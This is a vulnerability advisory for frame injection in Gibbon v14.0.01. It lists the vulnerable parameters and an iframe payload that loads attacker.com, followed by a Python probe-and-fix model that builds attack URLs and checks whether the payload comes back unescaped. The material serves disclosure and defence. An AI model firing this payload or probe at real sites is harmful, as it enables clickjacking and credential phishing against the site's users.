Gibbon v14.0.01 - Frame Injection Vulnerabilities

Advisory ID: RO-18-012
Severity: Medium
Vendor: Gibbon
Product: Gibbon
Version: v14.0.01

Overview

Frame Injection vulnerabilities exist in Gibbon v14.0.01. User-supplied parameter values are reflected into the HTML response without output encoding, so a remote attacker can place an arbitrary <iframe> element (a form of HTML injection) into pages served from the application's own origin.

Vulnerability Details

Affected Versions: v14.0.01 and earlier

Root Cause: Insufficient input validation and missing output encoding. The affected parameters are written back into the page as raw HTML instead of being passed through htmlspecialchars() or an equivalent encoder, so an iframe element supplied by the attacker is rendered by the victim's browser.

Technical Details

Install Page:

  • URL: /gibbon-install/installer/install.php?step=2
  • Parameters: databaseServer, databaseUsername (POST)
  • Attack Pattern: <iframe src="http://attacker.com/"></iframe>

Frontend:

  • URL: /core/index.php?q=/modules/Resources/resources_view.php
  • Parameter: tag (GET)
  • Attack Pattern: <iframe src="http://attacker.com/"></iframe>
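The following is an added example, not code from Gibbon or from the advisory author. It models the two reflection points listed above: a hypothetical vulnerable renderer that echoes the parameter raw, the same renderer with output encoding (the equivalent of PHP's htmlspecialchars()), and a check that classifies a response body as reflecting the advisory's iframe pattern unescaped, escaped, or not at all. The host name school.example, the function names and the response bodies are assumptions constructed here; nothing is fetched from a live system. The POST fields on the installer reflect the same way, so the same body check applies to their responses.

```python
"""Frame-injection probe and fix model (added example, not Gibbon's code)."""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Attack pattern exactly as listed in the advisory.
PAYLOAD = '<iframe src="http://attacker.com/"></iframe>'

# Frontend path from the advisory; the host is a placeholder.
BASE_URL = ('https://school.example/core/index.php'
            '?q=/modules/Resources/resources_view.php')


def build_probe_url(base, param, payload=PAYLOAD):
    """Append the reflected parameter, URL-encoded, to the target page."""
    sep = '&' if '?' in base else '?'
    return base + sep + urlencode({param: payload})


def vulnerable_render(tag):
    """Hypothetical model of the flaw: the value lands in the HTML unencoded."""
    return '<h2>Resources tagged: ' + tag + '</h2>'


def fixed_render(tag):
    """Same page with output encoding; html.escape(quote=True) encodes &, <, >, ", '
    like htmlspecialchars($tag, ENT_QUOTES) would in PHP."""
    return '<h2>Resources tagged: ' + html.escape(tag, quote=True) + '</h2>'


def simulate_get(url, param, render):
    """Offline stand-in for the HTTP round trip: take `param` from the query
    string of `url` and pass it through the page's renderer."""
    query = parse_qs(urlsplit(url).query)
    value = query.get(param, [''])[0]
    return render(value)


def reflection_status(body, payload=PAYLOAD):
    """Classify how the payload came back in a response body:
    'unescaped' (vulnerable), 'escaped' (encoded, safe), or 'absent'."""
    if payload in body:
        return 'unescaped'
    if (html.escape(payload, quote=True) in body
            or html.escape(payload, quote=False) in body):
        return 'escaped'
    return 'absent'


if __name__ == '__main__':
    url = build_probe_url(BASE_URL, 'tag')
    print('probe URL:', url)
    for name, render in (('vulnerable', vulnerable_render), ('fixed', fixed_render)):
        body = simulate_get(url, 'tag', render)
        print(f'{name:10s} -> {reflection_status(body)}')
```

Against a real target, replace simulate_get with an actual GET of the probe URL and feed the response body to reflection_status; an 'unescaped' result means the browser will render the attacker's frame inside the trusted page.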

Exploitation Requirements

  • No authentication is required for the frontend vector (resources_view.php); the attacker only needs a victim to open a crafted link.
  • The installer vector requires /gibbon-install/ to still be reachable, which is typically not the case on a completed deployment where the directory has been removed or blocked.

Impact

Remote attackers can exploit these vulnerabilities to:

  • Inject an attacker-controlled frame into a page served from the application's own origin, so its content appears to come from the trusted site
  • Overlay or replace page content for clickjacking and credential phishing against logged-in users
  • Load arbitrary external content into the victim's browser session

Solution

Update to a Gibbon release that includes the vendor fix of 2018-01-20. Independently of the upgrade, remove or block the /gibbon-install/ directory once installation is complete, and as defense in depth consider a Content-Security-Policy frame-src directive that limits which origins the application is allowed to embed.

References

Timeline:

  • [2018-01-17] - First Contact
  • [2018-01-20] - Vendor Fixed
  • [2018-06-28] - Advisory Released

Credits: Omar Kurt
